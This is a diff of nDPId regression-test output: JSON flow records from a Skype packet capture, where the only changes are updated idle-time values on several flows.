00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1121,34 +1121,34 @@ 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634591,"flow_last_seen":1431970661089,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634589,"flow_last_seen":1431970661089,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694738,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00845{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 